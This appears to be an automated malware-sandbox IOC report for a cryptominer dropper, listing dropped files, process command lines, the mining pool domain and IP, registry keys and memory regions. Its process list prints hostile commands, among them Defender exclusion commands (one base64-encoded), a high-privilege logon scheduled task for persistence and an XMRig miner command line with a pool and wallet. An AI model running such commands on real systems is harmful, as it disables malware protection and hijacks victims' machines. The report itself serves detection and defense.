IOC Report
C5Lg2JSPlD.exe

loading gif

Files

File Path
Type
Category
Malicious
C5Lg2JSPlD.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\C5Lg2JSPlD.exe.log
CSV text
dropped
malicious
C:\Users\user\AppData\Local\Temp\Miner.exe
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Windows\System32\Microsoft\Libs\WR64.sys
PE32+ executable (native) x86-64, for MS Windows
dropped
malicious
C:\Windows\System32\Microsoft\Libs\sihost64.exe
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\Windows\System32\services64.exe
PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
dropped
malicious
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_conhost.exe_bcf865d76fe77467e295cbb71eb4f98b4a9050eb_1260788c_3647c876-7f6c-415b-b9ba-02d3ee7c6d1e\Report.wer
Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER2DF1.tmp.dmp
Mini DuMP crash report, 15 streams, Mon Oct 7 22:20:50 2024, 0x1205a4 type
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER35D2.tmp.WERInternalMetadata.xml
XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER3631.tmp.xml
XML 1.0 document, ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER364E.tmp.csv
Unknown
dropped
C:\ProgramData\Microsoft\Windows\WER\Temp\WER368E.tmp.txt
Unknown
dropped
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1d5jlhc4.3if.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32dtwenn.klq.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_53bkrtvl.oii.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_czhap3co.go0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_esvl1jl3.amr.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g0enqpf1.2s0.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_g1krsgs1.qks.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kml5b2ko.yo1.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m1ul0p5e.mkl.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_o11vzrcn.0p4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rj3mgrzo.tgp.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rjzdy0sh.nn5.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rv5jia54.nbf.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s003a3yf.kah.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tzf3qx3j.nbr.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vatgffv0.rzd.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wkamg2rf.cv3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wutzwpln.eva.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yglhccxf.iey.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yi0o33m3.4c4.ps1
ASCII text, with no line terminators
dropped
C:\Windows\System32\wbem\Performance\WmiApRpl_new.h
ASCII text, with CRLF line terminators
dropped
C:\Windows\System32\wbem\Performance\WmiApRpl_new.ini
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Windows\appcompat\Programs\Amcache.hve
MS Windows registry file, NT/2000 or above
dropped
C:\Windows\system32\wbem\Performance\WmiApRpl.h (copy)
ASCII text, with CRLF line terminators
dropped
There are 28 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\C5Lg2JSPlD.exe
"C:\Users\user\Desktop\C5Lg2JSPlD.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHYAZgB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHcAcQB2ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAZwBhACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYgBoACMAPgA="
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Users\user\AppData\Local\Temp\Miner.exe
"C:\Users\user~1\AppData\Local\Temp\Miner.exe"
malicious
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\user~1\AppData\Local\Temp\Miner.exe"
malicious
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
malicious
C:\Windows\System32\cmd.exe
"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"
malicious
C:\Windows\System32\cmd.exe
"cmd" cmd /c "C:\Windows\system32\services64.exe"
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\services64.exe
C:\Windows\system32\services64.exe
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
malicious
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"
malicious
C:\Windows\System32\cmd.exe
"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
malicious
C:\Windows\System32\Microsoft\Libs\sihost64.exe
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
malicious
C:\Windows\explorer.exe
C:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=426RNxSSEqcPuv4hwEHkJf7kVHFWs8bprQJpMPxDcRx6RTQxZW7rByiXU4CnMDqrHL4s7VEpMG8Qj77ygdDRvkBU3Ncd1Wx --pass= --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-stealth
malicious
C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "/sihost64"
malicious
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\System32\wbem\WMIADAP.exe
wmiadap.exe /F /T /R
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 428 -p 3268 -ip 3268
C:\Windows\System32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 3268 -s 1096
C:\Windows\System32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
There are 20 hidden processes, click here to show them.

URLs

Name
IP
Malicious
http://upx.sf.net
unknown
https://xmrig.com/benchmark/%s
unknown
https://aka.ms/pscore68
unknown
https://xmrig.com/wizard
unknown
http://pesterbdd.com/images/Pester.png
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
http://www.apache.org/licenses/LICENSE-2.0.html
unknown
https://github.com/Pester/Pester
unknown
https://xmrig.com/wizard%s
unknown
http://schemas.xmlsoap.org/wsdl/
unknown
https://xmrig.com/docs/algorithms
unknown
There are 2 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
pool.hashvault.pro
95.179.241.203
malicious
time.windows.com
unknown
malicious

IPs

IP
Domain
Country
Malicious
95.179.241.203
pool.hashvault.pro
Netherlands
malicious

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\3268
Terminator
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\3268
Reason
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TermReason\3268
CreationTime
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
ProgramId
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
FileId
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
LowerCaseLongPath
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
LongPathHash
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
Name
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
OriginalFileName
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
Publisher
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
Version
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
BinFileVersion
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
BinaryType
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
ProductName
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
ProductVersion
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
LinkDate
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
BinProductVersion
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
AppxPackageFullName
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
AppxPackageRelativeId
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
Size
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
Language
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
IsOsComponent
\REGISTRY\A\{c5c1a998-ad81-10e3-5d55-bc9356dfd11c}\Root\InventoryApplicationFile\conhost.exe|a73bcd1ef9353f3e
Usn
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\2C85006A1A028BCC349DF23C474724C055FDE8B6
Blob
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\Windows Live ID Token Issuer\Certificates\B68D8F953E551914324E557E6164D68B9926650C
Blob
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qtltntcbrequaj
Reason
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bvfzdetyamjjhr
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02bvfzdetyamjjhr
Provision Monday, October 07, 2024 18:21:04
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bvfzdetyamjjhr
AppIdList
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
URL
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
Name
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
P3P
HKEY_USERS.DEFAULT\Software\Microsoft\AuthCookies\Live\Default\DIDC
Flags
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02psbtbqujhpqftm
Request Monday, October 07, 2024 18:21:10
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\Logs\02psbtbqujhpqftm
Response Monday, October 07, 2024 18:21:10
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02psbtbqujhpqftm
Reason
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jpxcxyldqefhdk
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jpxcxyldqefhdk
AppIdList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02qtltntcbrequaj
AppIdList
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL
GlobalDeviceUpdateTime
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bvfzdetyamjjhr
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bvfzdetyamjjhr
DeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-18\02bvfzdetyamjjhr
DeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
ValidDeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02psbtbqujhpqftm
AppIdList
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jpxcxyldqefhdk
DeviceId
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003
ValidDeviceId
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jpxcxyldqefhdk
DeviceId
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\ExtendedProperties
LID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
ClockTimeSeconds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\IdentityCRL\ClockData
TickCount
HKEY_CURRENT_USER\SOFTWARE\Microsoft\AuthCookies\Live\Default\DIDC
Data
HKEY_USERS.DEFAULT\Software\Microsoft\IdentityCRL\DeviceIdentities\production\S-1-5-21-2246122658-3693405117-2476756634-1003\02jpxcxyldqefhdk
DeviceId
There are 62 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
1F0CC3E8000
heap
page read and write
malicious
1F0CC3EC000
heap
page read and write
malicious
1F0CC3EE000
heap
page read and write
malicious
1F0CC3E8000
heap
page read and write
malicious
79F000
stack
page read and write
23A4000
heap
page read and write
20AB6820000
trusted library allocation
page read and write
1F0B3879000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
1F0CC1E1000
heap
page read and write
1F0CC150000
trusted library allocation
page read and write
7FFAAC3EC000
trusted library allocation
page execute and read and write
1F0B3760000
trusted library allocation
page read and write
20ACEFCF000
heap
page read and write
205D4F50000
remote allocation
page read and write
2670000
trusted library allocation
page read and write
20ACEF80000
trusted library allocation
page read and write
22D0000
heap
page read and write
1803000
unkown
page readonly
1AD011C0000
heap
page read and write
1F0B3836000
heap
page read and write
7217BBE000
stack
page read and write
1F0B3760000
trusted library allocation
page read and write
7FFAAC4D0000
trusted library allocation
page read and write
1AD00EE0000
heap
page read and write
1E12000
unkown
page readonly
1F0B37B0000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
20AB2F63000
unkown
page read and write
1F0B3780000
trusted library allocation
page read and write
20AB67A0000
trusted library allocation
page read and write
1AD03BD4000
trusted library allocation
page read and write
20ACEFB8000
heap
page read and write
1C4821E0000
heap
page read and write
1F0B37D3000
heap
page read and write
403000
unkown
page readonly
1F0CC150000
trusted library allocation
page read and write
72179B7000
stack
page read and write
20ACEFD4000
heap
page read and write
20AB67A0000
trusted library allocation
page read and write
1F0CC190000
trusted library allocation
page read and write
721888C000
stack
page read and write
4211000
trusted library allocation
page read and write
1F0B37BE000
heap
page read and write
20ACEFCD000
heap
page read and write
190000
heap
page read and write
20AB2FEF000
heap
page read and write
175C06C8000
heap
page read and write
1F0B3809000
heap
page read and write
2673000
heap
page read and write
20AB2D90000
heap
page read and write
20ACEFF1000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
21C2000
unkown
page read and write
1803000
unkown
page readonly
7FFB1E870000
unkown
page read and write
20AB6790000
trusted library allocation
page read and write
1803000
unkown
page readonly
4D6000
heap
page read and write
1F0B380B000
heap
page read and write
2454000
heap
page read and write
1F0B37A0000
trusted library allocation
page read and write
14C000
stack
page read and write
1F0B3760000
trusted library allocation
page read and write
20ACEFD4000
heap
page read and write
1F0B37ED000
heap
page read and write
20AB6730000
trusted library allocation
page read and write
1A0000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
20AB2F9D000
unkown
page read and write
1AD02A90000
heap
page read and write
1AD02B20000
heap
page execute and read and write
A6109FF000
unkown
page read and write
1A0000
heap
page read and write
7FFAAC3E0000
trusted library allocation
page read and write
721870E000
stack
page read and write
20AB65D0000
trusted library allocation
page read and write
1F0B3767000
trusted library allocation
page read and write
40C000
unkown
page readonly
20ACE8F0000
trusted library allocation
page read and write
4200000
heap
page execute and read and write
23C6000
heap
page read and write
20ACEF9B000
heap
page read and write
1F0B37A9000
heap
page read and write
1F0B37E9000
heap
page read and write
7FFAAC582000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
20AB6810000
trusted library allocation
page read and write
20AB6720000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
1F0B3770000
trusted library allocation
page read and write
1F0B3806000
heap
page read and write
1F0B3770000
trusted library allocation
page read and write
1F0C41FE000
trusted library allocation
page read and write
237C000
heap
page read and write
20AB67B0000
trusted library allocation
page read and write
1F0C4BFE000
trusted library allocation
page read and write
AB45A7E000
unkown
page readonly
30FF000
heap
page read and write
20AB67F0000
heap
page execute and read and write
AB459FD000
stack
page read and write
7FFAAC4E8000
trusted library allocation
page execute and read and write
20AB6790000
trusted library allocation
page read and write
403000
unkown
page readonly
20AB6860000
trusted library allocation
page read and write
20ACEFDF000
heap
page read and write
1F0B3710000
trusted library allocation
page read and write
1F0B3760000
trusted library allocation
page read and write
1C0000
heap
page read and write
1C0000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
1F0B386A000
heap
page read and write
1F0B3855000
heap
page read and write
1F0CC160000
trusted library allocation
page read and write
1AD01190000
heap
page readonly
AB4587E000
unkown
page readonly
1F0B3760000
trusted library allocation
page read and write
1F0B37D6000
heap
page read and write
20ACEF91000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
20AB3028000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
20ACEFC3000
heap
page read and write
20AB6D85000
trusted library allocation
page read and write
1F0B37B0000
trusted library allocation
page read and write
190000
heap
page read and write
20ACEFF1000
heap
page read and write
14C000
stack
page read and write
AB45C7E000
unkown
page readonly
7FFB1E872000
unkown
page readonly
89F000
stack
page read and write
20AB6790000
trusted library allocation
page read and write
E03000
unkown
page readonly
20AB65F0000
trusted library allocation
page read and write
1AD040F2000
trusted library allocation
page read and write
1F0B3760000
trusted library allocation
page read and write
1F0CC180000
trusted library allocation
page read and write
1F0B3890000
trusted library allocation
page read and write
1F0B37E4000
heap
page read and write
20AB2FEE000
heap
page read and write
20AB67D0000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
14217000
trusted library allocation
page read and write
20ACF002000
heap
page read and write
AB45AFE000
stack
page read and write
20AB6850000
trusted library allocation
page read and write
16019000
trusted library allocation
page read and write
1F0B37CE000
heap
page read and write
20AB6720000
trusted library allocation
page read and write
7218807000
stack
page read and write
1AD01020000
heap
page read and write
1F0B3820000
trusted library allocation
page read and write
1F0B3860000
trusted library allocation
page read and write
20AB2ED0000
heap
page read and write
1F0B37E6000
heap
page read and write
175C0530000
heap
page read and write
721787D000
stack
page read and write
1F0CC170000
trusted library allocation
page read and write
1F0CC160000
trusted library allocation
page read and write
23D9000
heap
page read and write
20ACEFF1000
heap
page read and write
7217ABE000
stack
page read and write
1F0CC150000
trusted library allocation
page read and write
2310000
heap
page read and write
7FFAAC500000
trusted library allocation
page execute and read and write
20ACEFFE000
heap
page read and write
20ACEF93000
heap
page read and write
403000
unkown
page readonly
1C0000
heap
page read and write
1AD01180000
trusted library allocation
page read and write
20ACEFDC000
heap
page read and write
1DCCE03A000
heap
page read and write
3073000
heap
page read and write
23CD000
heap
page read and write
20ACF028000
heap
page read and write
1F0B37E9000
heap
page read and write
1FD0000
heap
page read and write
721890C000
stack
page read and write
1AD03F34000
trusted library allocation
page read and write
1F0CC180000
trusted library allocation
page read and write
1F0B3830000
trusted library allocation
page read and write
1F0B37E9000
heap
page read and write
985000
heap
page read and write
E03000
unkown
page readonly
205D484C000
heap
page read and write
20AB2F71000
unkown
page read and write
20AB65C0000
trusted library allocation
page read and write
1AD029A0000
trusted library allocation
page read and write
1F0B3720000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
7DF4B36D0000
trusted library allocation
page execute and read and write
20AB65F3000
trusted library allocation
page read and write
1AD01052000
heap
page read and write
721898E000
stack
page read and write
239A000
heap
page read and write
1F0B37E2000
heap
page read and write
1F0CC152000
trusted library allocation
page read and write
403000
unkown
page readonly
1AD0107F000
heap
page read and write
1F0CC15C000
trusted library allocation
page read and write
20AB3022000
heap
page read and write
1C4821EA000
heap
page read and write
20AB67B0000
trusted library allocation
page read and write
1F0B3871000
heap
page read and write
20AB6880000
trusted library allocation
page read and write
20ACEFC7000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
20AB6740000
trusted library allocation
page read and write
20ACEFC2000
heap
page read and write
1F0AFE10000
heap
page read and write
AB45CFE000
stack
page read and write
1F0B3760000
trusted library allocation
page read and write
20AB301F000
heap
page read and write
175C06C4000
heap
page read and write
20AB3023000
heap
page read and write
1F0B3720000
trusted library allocation
page read and write
20AB301F000
heap
page read and write
175C06DB000
heap
page read and write
20ACEF82000
heap
page read and write
20AB6790000
trusted library allocation
page read and write
175C0630000
heap
page read and write
1F0B3785000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
7FFB1E851000
unkown
page execute read
205D4863000
heap
page read and write
1F0B3760000
trusted library allocation
page read and write
1F0B37C7000
heap
page read and write
1F0B37A1000
heap
page read and write
1F0B3865000
heap
page read and write
20ACEFA5000
heap
page read and write
1AD03F30000
trusted library allocation
page read and write
400000
unkown
page readonly
401000
unkown
page execute read
1AD0109F000
heap
page read and write
20ACEFA9000
heap
page read and write
7FFAAC4E6000
trusted library allocation
page execute and read and write
1F0CC160000
trusted library allocation
page read and write
20AB2FFF000
heap
page read and write
20AB67E0000
trusted library allocation
page read and write
1F0B3760000
trusted library allocation
page read and write
1DCCDF70000
heap
page read and write
205D485D000
heap
page read and write
20AB67A0000
trusted library allocation
page read and write
1F0CC150000
trusted library allocation
page read and write
20ACEFB7000
heap
page read and write
1F0CC190000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
20AB6790000
trusted library allocation
page read and write
1F0B3760000
